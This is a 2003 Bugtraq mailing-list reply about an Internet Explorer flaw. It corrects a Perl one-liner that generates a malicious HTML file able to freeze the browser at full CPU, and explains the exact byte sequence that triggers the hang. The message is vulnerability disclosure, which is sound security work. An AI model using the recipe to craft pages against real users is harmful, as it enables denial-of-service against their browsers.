[29975] in bugtraq
Re: April appeared to be a month of IE bugs. Here's another one.
daemon@ATHENA.MIT.EDU (ERRor)
Thu May 1 14:29:26 2003
Message-ID: <001701c30f80$b533b080$9801a8c0@nobody>
From: "ERRor" <error@pochtamt.ru>
To: <bugtraq@securityfocus.com>
Date: Thu, 1 May 2003 05:26:34 +0400
MIME-Version: 1.0
Content-Type: text/plain;
charset="koi8-r"
Content-Transfer-Encoding: 7bit
> >Hello, Bugtraq.
>
> >Malicious htm file can freeze IE with 100% CPU usage:
> >Construct the file freeze.htm:
> >c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm
>
This string works only with Active Perl, in unix-like Perl versions exploit
string is:
perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
Active Perl understand \n = \x0D\x0A, freeze of IE exist only if sequence
of bytes will be ...\x0D\x0D\x0A...
Sorry, I have not noticed it at once.
Best Regards, ERRor, dHtm.
